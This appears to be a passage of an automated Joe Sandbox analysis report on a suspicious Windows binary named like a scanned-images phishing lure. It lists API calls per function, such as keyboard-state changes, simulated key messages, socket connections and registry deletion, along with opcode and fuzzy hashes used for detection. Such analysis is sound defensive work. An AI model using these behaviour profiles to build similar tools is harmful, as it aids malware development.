• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 67cf644fd868c03d9430c3ff270c4cd93571bce039cedbbedfb4c426024df6e4
                                                        • Instruction ID: 060530e0a3f461527447fccd97f907703d87f07557711e693b0d2fb271400814
                                                        • Opcode Fuzzy Hash: 67cf644fd868c03d9430c3ff270c4cd93571bce039cedbbedfb4c426024df6e4
                                                        • Instruction Fuzzy Hash: F761AE75A00629DFCF14DFA8D6819AEBBF4FF48710F148469E856AB351CB31AD41CB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00A8149C
                                                        • GetKeyboardState.USER32(?), ref: 00A814B1
                                                        • SetKeyboardState.USER32(?), ref: 00A81512
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A81540
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A8155F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A815A5
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A815C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f00e747cad511b08c31c8169eaa3db6aa575a04a40f3d65ebddbf69457d5a3bb
• Instruction ID: 5413b3e107e814b411e808a5fb88b04d2181a341da58b7ecc5947e0c5361c7ea
• Opcode Fuzzy Hash: f00e747cad511b08c31c8169eaa3db6aa575a04a40f3d65ebddbf69457d5a3bb
• Instruction Fuzzy Hash: 5951F4A0A047D63EFB3A63748C45BBA7FAD6B46304F088489E1D5858C2D3D8DC96D750
APIs
• GetParent.USER32(00000000), ref: 00A812B5
• GetKeyboardState.USER32(?), ref: 00A812CA
• SetKeyboardState.USER32(?), ref: 00A8132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A81357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A81374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A813B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A813D9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 8d38db62d38b86ddeff96a94e1886074580398df2859024cba70add9cd0f328d
• Instruction ID: b767bc73b9fead58c7b10726f4a218fee6c979b8f5a8ad69cff6dbce8feb50a5
• Opcode Fuzzy Hash: 8d38db62d38b86ddeff96a94e1886074580398df2859024cba70add9cd0f328d
• Instruction Fuzzy Hash: BB5106A09047D53DFB36A3748C45BBABFADAF06300F088589E1D58A8C2D395EC96D750
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 90f7a734781774dc2714ca061124adb9eb9a5a339d679163317ef37e79683ef1
• Instruction ID: d5d4ecec96075985019db9711dcedb1e16df2a382753a01795c6fa6a891d0b6f
• Opcode Fuzzy Hash: 90f7a734781774dc2714ca061124adb9eb9a5a339d679163317ef37e79683ef1
• Instruction Fuzzy Hash: 0841B16AC20218B6CB50FBB5C88AACFB7AC9F44310F508452F958E3121F734E714C7A9
Similarity
• API ID:
• String ID: @U=u
• API String ID: 0-2594219639
• Opcode ID: 158714e9fcbbea87aee029853258157e68a270aec9e48d751c279554380dda89
• Instruction ID: 2cc7b4bc68f663b16152aa8a19bf597a525a998f31b6361edd1caedffaa0e7d7
• Opcode Fuzzy Hash: 158714e9fcbbea87aee029853258157e68a270aec9e48d751c279554380dda89
• Instruction Fuzzy Hash: 9541F539900205AFDB24DF68CC48FB9BBF4EB2B310F140165F856AB2E1D770AD41DA61
APIs
  • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A838D3,?), ref: 00A848C7
  • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A838D3,?), ref: 00A848E0
• lstrcmpiW.KERNEL32(?,?), ref: 00A838F3
• _wcscmp.LIBCMT ref: 00A8390F
• MoveFileW.KERNEL32(?,?), ref: 00A83927
• _wcscat.LIBCMT ref: 00A8396F
• SHFileOperationW.SHELL32(?), ref: 00A839DB
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 58bf33a39c171a33fb590a4a13db394df18581ea7a66549c6362b478ba822e81
• Instruction ID: 7dafb1000c4066f21d453beeef4e230607d31099f89e169e1eb1829b18c0b725
• Opcode Fuzzy Hash: 58bf33a39c171a33fb590a4a13db394df18581ea7a66549c6362b478ba822e81
• Instruction Fuzzy Hash: 70419DB24083459ECB61FF64C591AEFB7ECAF88740F40192EF48AC3251EA74D688C752
APIs
• _memset.LIBCMT ref: 00AA7519
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA75C0
• IsMenu.USER32(?), ref: 00AA75D8
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA7620
• DrawMenuBar.USER32 ref: 00AA7633
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: c686a510a4fa63ea657d84657731153d1015a46211c13be8ad969a0b5d0af990
• Instruction ID: 0625c16aa04a719d9c34085dd5665df5db3248f5bb154bcba04dbacd0d2e2228
• Opcode Fuzzy Hash: c686a510a4fa63ea657d84657731153d1015a46211c13be8ad969a0b5d0af990
• Instruction Fuzzy Hash: 4F412975A04649EFDB20DF94D884EAEBBF9FB0A350F048129E9559B290DB30ED51CF90
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00AA125C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA1286
• FreeLibrary.KERNEL32(00000000), ref: 00AA133D
  • Part of subcall function 00AA122D: RegCloseKey.ADVAPI32(?), ref: 00AA12A3
  • Part of subcall function 00AA122D: FreeLibrary.KERNEL32(?), ref: 00AA12F5
  • Part of subcall function 00AA122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AA1318
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00AA12E0
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: eecc08fdb94a68f0cab16cbdaa4b2c90a54bd04169f71dfab0653c9936b4e46e
• Instruction ID: fac696b7bc6bc2a114604f0ef0d7d57b7102945926125ca08c49eb09d66fddd7
• Opcode Fuzzy Hash: eecc08fdb94a68f0cab16cbdaa4b2c90a54bd04169f71dfab0653c9936b4e46e
• Instruction Fuzzy Hash: 853119B1901109BFDF14DFD0DC89AFEB7BCEB0A300F00016AE512E7191EB749E499AA4
APIs
  • Part of subcall function 00A980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A964D9
• WSAGetLastError.WSOCK32(00000000), ref: 00A964E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A96521
• connect.WSOCK32(00000000,?,00000010), ref: 00A9652A
• WSAGetLastError.WSOCK32 ref: 00A96534
• closesocket.WSOCK32(00000000), ref: 00A9655D
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A96576
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 300072af5a49d983f7a231eab73b09b2eb9bf29dfb1d21cb5855b7ef6be40de4
• Instruction ID: 851ea27286fd0b4aa3a4abffb7df2e7a7b2deb67cba7eb2b5fbd099a826328b3
• Opcode Fuzzy Hash: 300072af5a49d983f7a231eab73b09b2eb9bf29dfb1d21cb5855b7ef6be40de4
• Instruction Fuzzy Hash: 87319E31600218AFDF10AFA4DD85BBA7BE8EF49764F048029F90997291DB74AD05CBA1
APIs
  • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
  • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A793F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A79409
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00A79439
  • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: @U=u$ComboBox$ListBox
• API String ID: 365058703-2258501812
• Opcode ID: 21a1c9e248db9d5b256c37282a533bb00c3900655210b6a69d0e15ddd62e7b01
• Instruction ID: 7c459304df2d2d76409074fe8bd49069fd0db88e32a9b3adfb2e8d8aeee1c496
• Opcode Fuzzy Hash: 21a1c9e248db9d5b256c37282a533bb00c3900655210b6a69d0e15ddd62e7b01
• Instruction Fuzzy Hash: 8A21F671900104BFDB18ABB4DD86DFFB778EF45350B14C52AF929972E1DB354E0A9620
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A7E0FA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A7E120
• SysAllocString.OLEAUT32(00000000), ref: 00A7E123
• SysAllocString.OLEAUT32 ref: 00A7E144
• SysFreeString.OLEAUT32 ref: 00A7E14D
• StringFromGUID2.OLE32(?,?,00000028), ref: 00A7E167
• SysAllocString.OLEAUT32(?), ref: 00A7E175
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 9ad4f600f6ea179408f3292df07f361297fe0c0445670343e3cac3c0ad9295d4
• Instruction ID: 9a6666ea8d4e6c218d9fe15804c444647b171512f0b27f1b632eba730265c745
• Opcode Fuzzy Hash: 9ad4f600f6ea179408f3292df07f361297fe0c0445670343e3cac3c0ad9295d4
• Instruction Fuzzy Hash: 46213035604109AF9B14DFE8DC89DABB7ACEB1D760B50C275F919CB2A0DB709C428B64
APIs
• IsWindowVisible.USER32(?), ref: 00A7B6C7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A7B6E4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7B71C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A7B742
• _wcsstr.LIBCMT ref: 00A7B74C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID: @U=u
• API String ID: 3902887630-2594219639
• Opcode ID: 00dfb02f181b4bd6c62cc921deaee6279ff597a7a7c7cf579904b5ecf9b3c345
• Instruction ID: f851080b7410ea42e550e623de0a629bb297e0d7207a37371af2f5677ebd9c14
• Opcode Fuzzy Hash: 00dfb02f181b4bd6c62cc921deaee6279ff597a7a7c7cf579904b5ecf9b3c345
• Instruction Fuzzy Hash: 73210A71605244BBEB299B759D49F7B7BA8DF85710F00C039F909CA1A1EB61CC4192A0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79802
  • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79834
• __itow.LIBCMT ref: 00A7984C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79874
• __itow.LIBCMT ref: 00A79885
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID: @U=u
                                                        • API String ID: 2983881199-2594219639
                                                        • Opcode ID: cf738d0139e8ef8bc11720d682ec8c5858e2fd2e788261edce44603e287bfcc1
                                                        • Instruction ID: dcf47ea61c9e11c3dc4fcfd8c82eb1688cd4f2bffc3b90315d0e6a7aa3f52a9f
                                                        • Opcode Fuzzy Hash: cf738d0139e8ef8bc11720d682ec8c5858e2fd2e788261edce44603e287bfcc1
                                                        • Instruction Fuzzy Hash: 9621B331A00204ABDB10DBA59D86EEF7BA8EF4A710F088036F909AB291D7708D4587D2
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AA78A1
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AA78AE
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AA78B9
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AA78C8
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AA78D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 38f0961c16883c0f10a456ba7fde9057842dfac3e7c6cc5c66c812a4a15ee5c8
                                                        • Instruction ID: ce6623aecc89d89487f43c8c06f49906876865818fcab1f12614a2394fae886e
                                                        • Opcode Fuzzy Hash: 38f0961c16883c0f10a456ba7fde9057842dfac3e7c6cc5c66c812a4a15ee5c8
                                                        • Instruction Fuzzy Hash: 7A1190B2110219BFEF159FA4CC85EEB7F6DEF0D7A8F014115BA04A6090C7729C61DBA0
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A44292,?), ref: 00A441E3
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A441EA
                                                        • EncodePointer.KERNEL32(00000000), ref: 00A441F6
                                                        • DecodePointer.KERNEL32(00000001,00A44292,?), ref: 00A44213
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 3489934621-340411864
                                                        • Opcode ID: f1596fc52df185041005a1fce3c5b6f7fefc0045823256860111285c57f39a7d
                                                        • Instruction ID: c5f0bbf00629589d670391895d1efa2d7bc5a89336a03fa411daa9c24e3145a8
                                                        • Opcode Fuzzy Hash: f1596fc52df185041005a1fce3c5b6f7fefc0045823256860111285c57f39a7d
                                                        • Instruction Fuzzy Hash: AEE012B4590741AEEF20EBF0EC49B443A98B799703F104A24F521D90E0D7B540979F10
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A441B8), ref: 00A442B8
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A442BF
                                                        • EncodePointer.KERNEL32(00000000), ref: 00A442CA
                                                        • DecodePointer.KERNEL32(00A441B8), ref: 00A442E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: 5f1ddc709ec7a1e956e6000498a3c9b28101fc0803afc2c83c1e809855d666ff
                                                        • Instruction ID: a872e87ed9e4dfc67b220b1c5d50993a4ad72ca5dcbd4a38b52aacfdcc52a44c
                                                        • Opcode Fuzzy Hash: 5f1ddc709ec7a1e956e6000498a3c9b28101fc0803afc2c83c1e809855d666ff
                                                        • Instruction Fuzzy Hash: 41E0B6BC681342AFEF54EBE1EC4DB853AACB769742F104A29F111E90E0CBB44546DB14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 443bcbea03257af6778d6f137f86389caba87f09aab181fa486d5aa69778a124
                                                        • Instruction ID: 094384b2f13af5a0fe35ec9e474144bde861712f768cd796bbc92fd822c7609d
                                                        • Opcode Fuzzy Hash: 443bcbea03257af6778d6f137f86389caba87f09aab181fa486d5aa69778a124
                                                        • Instruction Fuzzy Hash: B961C13050066A9BEF11FF64DE82EFF37A4AF48708F044529F8595B292DB349D45CB90
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0548
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA0588
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AA05AB
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AA05D4
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AA0617
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0624
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: aa7374e0fca0033d290da4ab065a35b136f853c9e91b9743cb1db595c78fd1fa
                                                        • Instruction ID: 5c63f6a20d8ff60c3a8adac53d640e3716f49afbad7a5c03f853c90047394ba2
                                                        • Opcode Fuzzy Hash: aa7374e0fca0033d290da4ab065a35b136f853c9e91b9743cb1db595c78fd1fa
                                                        • Instruction Fuzzy Hash: 79516931508201AFCB14EF68D985E6FBBE8FF89314F04892DF585872A1DB71E905CB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00AA5A82
                                                        • GetMenuItemCount.USER32(00000000), ref: 00AA5AB9
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AA5AE1
                                                        • GetMenuItemID.USER32(?,?), ref: 00AA5B50
                                                        • GetSubMenu.USER32(?,?), ref: 00AA5B5E
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AA5BAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 229b99c1a7a725f7581630cf49880b25337e1a6c886acdf642638a296ee84fee
                                                        • Instruction ID: 0dee75fb8d9f59b0e24ae26af4c628d21635225f6370fbd7f3de132665ca8496
                                                        • Opcode Fuzzy Hash: 229b99c1a7a725f7581630cf49880b25337e1a6c886acdf642638a296ee84fee
                                                        • Instruction Fuzzy Hash: A2519F35E00625EFCF15EFA4C945AAEB7B4EF49720F104469F802BB391DB71AE418B94
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A7F3F7
                                                        • VariantClear.OLEAUT32(00000013), ref: 00A7F469
                                                        • VariantClear.OLEAUT32(00000000), ref: 00A7F4C4
                                                        • _memmove.LIBCMT ref: 00A7F4EE
                                                        • VariantClear.OLEAUT32(?), ref: 00A7F53B
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A7F569
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 117140ce41a22e6ef61a6d486f10dfc0bab4b95a86d1441a0563d22fb44b1aea
                                                        • Instruction ID: b15519b9aeb555622a6bb9e3fc180b7dca83dc1fa7f67beb717fe12c34aa8930
                                                        • Opcode Fuzzy Hash: 117140ce41a22e6ef61a6d486f10dfc0bab4b95a86d1441a0563d22fb44b1aea
                                                        • Instruction Fuzzy Hash: 595158B5A00209AFCB14CF58D880AAAB7B8FF4C354B15C169ED59DB340D730EA12CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82747
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82792
                                                        • IsMenu.USER32(00000000), ref: 00A827B2
                                                        • CreatePopupMenu.USER32 ref: 00A827E6
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00A82844
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A82875
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: a966accdbf1265a2b05b2ee04bbeb625ed5bfc2b63d1d20892c9971585dd494b
                                                        • Instruction ID: 1f6779cc0ba91734116ad84a5fbd09b5f0dc1e0603a344378760da801662e2c7
                                                        • Opcode Fuzzy Hash: a966accdbf1265a2b05b2ee04bbeb625ed5bfc2b63d1d20892c9971585dd494b
                                                        • Instruction Fuzzy Hash: A751AD70A0030AEFDF25EFA8D988BBEBBF5EF45314F104269E8119B291D7709945CB51
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A2179A
                                                        • GetWindowRect.USER32(?,?), ref: 00A217FE
                                                        • ScreenToClient.USER32(?,?), ref: 00A2181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A2182C
                                                        • EndPaint.USER32(?,?), ref: 00A21876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
